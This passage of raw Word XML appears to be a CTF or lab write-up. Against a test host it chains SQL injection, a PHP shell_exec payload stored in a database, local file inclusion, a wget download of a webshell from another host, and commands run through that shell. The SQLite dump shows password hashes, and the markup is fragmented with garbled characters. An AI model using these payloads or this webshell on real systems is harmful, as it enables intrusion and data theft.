    </w:p>
    <w:p w14:paraId="27C19EA9" w14:textId="77777777" w:rsidR="00630904" w:rsidRPr="00E71325" w:rsidRDefault="00630904" w:rsidP="001A2A0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Testing write data into file in /tmp/bla.txt using </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1CDB33" w14:textId="77777777" w:rsidR="00630904" w:rsidRPr="00E71325" w:rsidRDefault="00630904" w:rsidP="001A2A06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3011FA09" w14:textId="77777777" w:rsidR="00630904" w:rsidRPr="00E71325" w:rsidRDefault="00630904" w:rsidP="001A2A0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select 'test injexct' into outfile'/tmp/bla.txt';, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140AB9E4" w14:textId="77777777" w:rsidR="00630904" w:rsidRPr="00E71325" w:rsidRDefault="00630904" w:rsidP="001A2A06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CB7EF3E" w14:textId="77777777" w:rsidR="00630904" w:rsidRPr="00E71325" w:rsidRDefault="00630904" w:rsidP="001A2A0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 xml:space="preserve">And reading it with </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360B6DF3" w14:textId="77777777" w:rsidR="00630904" w:rsidRPr="00E71325" w:rsidRDefault="00630904" w:rsidP="001A2A06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="620734E7" w14:textId="35952DC4" w:rsidR="00630904" w:rsidRPr="00E71325" w:rsidRDefault="00630904" w:rsidP="001A2A0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root@kali:~/Desktop# curl 'http://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 xml:space="preserve">/view.php?page=../../tmp/bla.txt' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B63283C" w14:textId="77777777" w:rsidR="00630904" w:rsidRPr="00E71325" w:rsidRDefault="00630904" w:rsidP="001A2A06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F4D9A33" w14:textId="3BE0A74B" w:rsidR="00FA7C2C" w:rsidRPr="00E71325" w:rsidRDefault="00630904" w:rsidP="001A2A0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Does not seems to work</w:t>
      </w:r>
      <w:r w:rsidR="006552F8" w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>, but</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0714968F" w14:textId="77777777" w:rsidR="006552F8" w:rsidRPr="00E71325" w:rsidRDefault="006552F8" w:rsidP="001A2A06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="347EBCB1" w14:textId="49A79DBA" w:rsidR="006552F8" w:rsidRPr="00E71325" w:rsidRDefault="006552F8" w:rsidP="001A2A0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INSERT INTO "info" ("name","pass","id") VALUES (‘&lt;?php echo shell_exec("id") ?&gt; ','pass','3')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6889A959" w14:textId="77777777" w:rsidR="00FC4141" w:rsidRDefault="00FC4141" w:rsidP="001A2A06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A2F069C" w14:textId="5B139AAC" w:rsidR="006552F8" w:rsidRPr="00E71325" w:rsidRDefault="006552F8" w:rsidP="001A2A06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And</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591D7B64" w14:textId="77777777" w:rsidR="006552F8" w:rsidRPr="00E71325" w:rsidRDefault="006552F8" w:rsidP="001A2A06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D18D3F7" w14:textId="04292DB3" w:rsidR="006552F8" w:rsidRPr="00E71325" w:rsidRDefault="006552F8" w:rsidP="006552F8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root@kali:~/Desktop# curl 'http://</w:t>
      </w:r>
      <w:r w:rsidR="004359C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>10.0.0.19</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>/view.php?page=../../usr/databases/test_users'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8865C6" w14:textId="77777777" w:rsidR="006552F8" w:rsidRPr="00E71325" w:rsidRDefault="006552F8" w:rsidP="006552F8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separator/>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:separator/>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Grande" w:hAnsi="Lucida Grande" w:cs="Lucida Grande"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:separator/>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Grande" w:hAnsi="Lucida Grande" w:cs="Lucida Grande"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:separator/>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Grande" w:hAnsi="Lucida Grande" w:cs="Lucida Grande"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:separator/>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Grande" w:hAnsi="Lucida Grande" w:cs="Lucida Grande"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:separator/>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:continuationSeparator/>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Iuid=33(www-data) gid=33(www-data) groups=33(www-data) TEXT, 'id' INTEGER PRIMARY KEY NOT NULL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A218F2E" w14:textId="77B53BDC" w:rsidR="006552F8" w:rsidRPr="00E71325" w:rsidRDefault="006552F8" w:rsidP="006552F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>pass(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:continuationSeparator/>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Mzico96781A607F4E9F5F423AC01F0DAB0EBD(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:continuationSeparator/>
      </w:r>
      <w:r w:rsidRPr="00E71325">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Mroot653F4B285089453FE00E2AAFAC573414</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24943F05" w14:textId="77777777" w:rsidR="00FC4141" w:rsidRDefault="00FC4141" w:rsidP="001A2A06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46F687BD" w14:textId="126A1E76" w:rsidR="00FC4141" w:rsidRDefault="00121AFC" w:rsidP="001A2A06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Seems to work.  So I go</w:t>
      </w:r>
      <w:r w:rsidR="00FC4141">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">t command execution now, but it’s very limited, so I’m going to modify the command to download a </w:t>
      </w:r>
      <w:r w:rsidR="005A467E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">quick </w:t>
      </w:r>
      <w:r w:rsidR="00FC4141">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>PHP GET webshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38716033" w14:textId="77777777" w:rsidR="00FC4141" w:rsidRDefault="00FC4141" w:rsidP="001A2A06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AC22B48" w14:textId="7E10DC44" w:rsidR="00FC4141" w:rsidRDefault="00FC4141" w:rsidP="001A2A06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC4141">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>&lt;?php echo shell_exec("wget http://10.0.0.100/webShell.txt -O /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">tmp/webShell.php") ?&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06037041" w14:textId="77777777" w:rsidR="00FC4141" w:rsidRDefault="00FC4141" w:rsidP="001A2A06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CF63445" w14:textId="77777777" w:rsidR="00FC4141" w:rsidRDefault="00FC4141" w:rsidP="001A2A06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C401FEC" w14:textId="54DFE942" w:rsidR="00FC4141" w:rsidRDefault="005A467E" w:rsidP="001A2A06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>webShell.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E6A458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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523B98DD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echo"&lt;pre&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53642868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echo shell_exec($_GET['cmd']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446EFA9E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echo"&lt;pre&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70915B42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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FACEBD0" w14:textId="77777777" w:rsidR="005A467E" w:rsidRDefault="005A467E" w:rsidP="001A2A06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1366E758" w14:textId="77777777" w:rsidR="005A467E" w:rsidRDefault="005A467E" w:rsidP="001A2A06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="631566F1" w14:textId="51F514D2" w:rsidR="00FC4141" w:rsidRDefault="005A467E" w:rsidP="001A2A0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911F723" wp14:editId="5DB05D38">
            <wp:extent cx="5486400" cy="4348480"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Picture 3" descr="MyShit:Users:mee:Desktop:img:2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hit:Users:mee:Desktop:img:22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0CF5" w14:textId="77777777" w:rsidR="00FC4141" w:rsidRDefault="00FC4141" w:rsidP="001A2A06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73CCF1EF" w14:textId="7A44CC61" w:rsidR="00FC4141" w:rsidRDefault="005A467E" w:rsidP="001A2A06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>After executing the injected command in the database, I should now have a web shell to run commands freely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFC323A" w14:textId="77777777" w:rsidR="005A467E" w:rsidRDefault="005A467E" w:rsidP="001A2A06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CB33005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root@kali:~/Desktop# curl 'http://10.0.0.19/view.php?page=../../usr/databases/test_users'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01462F59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SQLite format 3</w:t>
      </w:r>
      <w:r w:rsidRPr="005A467E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:continuationSeparator/>
      </w:r>
      <w:r w:rsidRPr="005A467E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">@  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9322CC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separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C287F2" w14:textId="33AAF887" w:rsid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separator/>
      </w:r>
      <w:r w:rsidRPr="005A467E">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Grande" w:hAnsi="Lucida Grande" w:cs="Lucida Grande"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r w:rsidRPr="005A467E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:separator/>
      </w:r>
      <w:r w:rsidRPr="005A467E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:separator/>
      </w:r>
      <w:r w:rsidRPr="005A467E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="005A467E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:separator/>
      </w:r>
      <w:r w:rsidRPr="005A467E">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Grande" w:hAnsi="Lucida Grande" w:cs="Lucida Grande"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r w:rsidRPr="005A467E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:separator/>
      </w:r>
      <w:r w:rsidRPr="005A467E">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Grande" w:hAnsi="Lucida Grande" w:cs="Lucida Grande"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r w:rsidRPr="005A467E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:separator/>
      </w:r>
      <w:r w:rsidRPr="005A467E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="005A467E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:separator/>
      </w:r>
      <w:r w:rsidRPr="005A467E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>"_</w:t>
      </w:r>
      <w:r w:rsidRPr="005A467E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:continuationSeparator/>
      </w:r>
      <w:r w:rsidRPr="005A467E">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Grande" w:hAnsi="Lucida Grande" w:cs="Lucida Grande"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r w:rsidRPr="005A467E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>9 pass)(</w:t>
      </w:r>
      <w:r w:rsidRPr="005A467E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:continuationSeparator/>
      </w:r>
      <w:r w:rsidRPr="005A467E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Mzico96781A607F4E9F5F423AC01F0DAB0EBD(</w:t>
      </w:r>
      <w:r w:rsidRPr="005A467E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:continuationSeparator/>
      </w:r>
      <w:r w:rsidRPr="005A467E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Mroot653F4B285089453FE00E2AAFAC573414</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE63558" w14:textId="77777777" w:rsidR="005A467E" w:rsidRDefault="005A467E" w:rsidP="001A2A06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FCA0DBB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 xml:space="preserve">root@kali:~/Desktop# curl 'http://10.0.0.19/view.php?page=../../tmp/webShell.php&amp;cmd=whoami;pwd;ls+-al' | html2text </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257D854B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 xml:space="preserve">  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6F573A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 xml:space="preserve">                                 Dload  Upload   Total   Spent    Left  Speed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597222C3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100   777  100   777    0     0   101k      0 --:--:-- --:--:-- --:--:--  108k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAC72C0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www-data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BAF669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/var/www</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638BD8A2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total 72</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0702AB6D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drwxr-xr-x  8 root root 4096 Jun  8 19:19 .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C772FA5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drwxr-xr-x 12 root root 4096 Jun  8 13:06 ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536B8583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-rwxrwxrwx  1 root root 1094 Jun  8 14:42 LICENSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEDD1BF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-rwxrwxrwx  1 root root 1533 Jun  8 14:42 README.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64948073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drwxrwxrwx  2 root root 4096 Jun  8 14:42 css</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3010A37B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drwxrwxrwx  2 root root 4096 Jun  8 16:09 dbadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095C6826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-rwxrwxrwx  1 root root 3132 Jun  8 14:42 gulpfile.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391431B4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drwxrwxrwx  3 root root 4096 Jun  8 14:42 img</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C38D32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-rwxrwxrwx  1 root root 7970 Jun  8 19:18 index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270CA9F5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drwxrwxrwx  2 root root 4096 Jun  8 14:42 js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE0D9F9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drwxrwxrwx  2 root root 4096 Jun  8 14:42 less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C16E13F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-rwxrwxrwx  1 root root  789 Jun  8 14:42 package.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CC2C24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-rwxrwxrwx  1 root root 8355 Jun  8 19:17 tools.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C63D76" w14:textId="77777777" w:rsidR="005A467E" w:rsidRP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drwxrwxrwx  7 root root 4096 Jun  8 14:42 vendor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C61A3A5" w14:textId="3B30D6A5" w:rsidR="005A467E" w:rsidRDefault="005A467E" w:rsidP="005A467E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A467E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>-rwxrwxrwx  1 root root   61 Jun  8 17:07 view.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E63E73" w14:textId="77777777" w:rsidR="001A5773" w:rsidRDefault="001A5773" w:rsidP="005A467E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F67F12" w14:textId="165A3F84" w:rsidR="001A5773" w:rsidRDefault="00121AFC" w:rsidP="005A467E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>This is much better, so t</w:t>
      </w:r>
      <w:r w:rsidR="001A5773">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ime to get a</w:t>
      </w:r>
      <w:r w:rsidR="005C021F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> real</w:t>
      </w:r>
      <w:r w:rsidR="001A5773">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
      <w:r w:rsidR="00691A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00691A37" w:rsidRPr="00691A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F04A"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="39993022" w14:textId="77777777" w:rsidR="005A467E" w:rsidRPr="00E71325" w:rsidRDefault="005A467E" w:rsidP="001A2A06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="458601E0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root@kali:~/Desktop# nmap 10.0.0.19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4102CBA9" w14:textId="77777777" w:rsidR="00DB4F1B" w:rsidRPr="00DB4F1B" w:rsidRDefault="00DB4F1B" w:rsidP="00DB4F1B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="234BF1B5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Starting Nmap 7.40 ( https://nmap.org ) at 2017-10-22 21:21 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33846207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mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B18600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mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6E9793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Nmap scan report for 10.0.0.19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B9B9B2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Host is up (0.00076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E15AC98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Not shown: 997 closed ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608B0F45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PORT    STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D5B1EB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22/tcp  open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1754C6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80/tcp  open  http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301BDF96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111/tcp open  rpcbind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385D450D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MAC Address: C8:BC:C8:C9:34:C2 (Apple)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2EC91B" w14:textId="77777777" w:rsidR="00DB4F1B" w:rsidRPr="00DB4F1B" w:rsidRDefault="00DB4F1B" w:rsidP="00DB4F1B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30E2C32B" w14:textId="36E5F24B" w:rsidR="001C1291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Nmap done: 1 IP address (1 host up) scanned in 0.44 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8CE6DD" w14:textId="77777777" w:rsidR="00DB4F1B" w:rsidRDefault="00DB4F1B" w:rsidP="00DB4F1B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
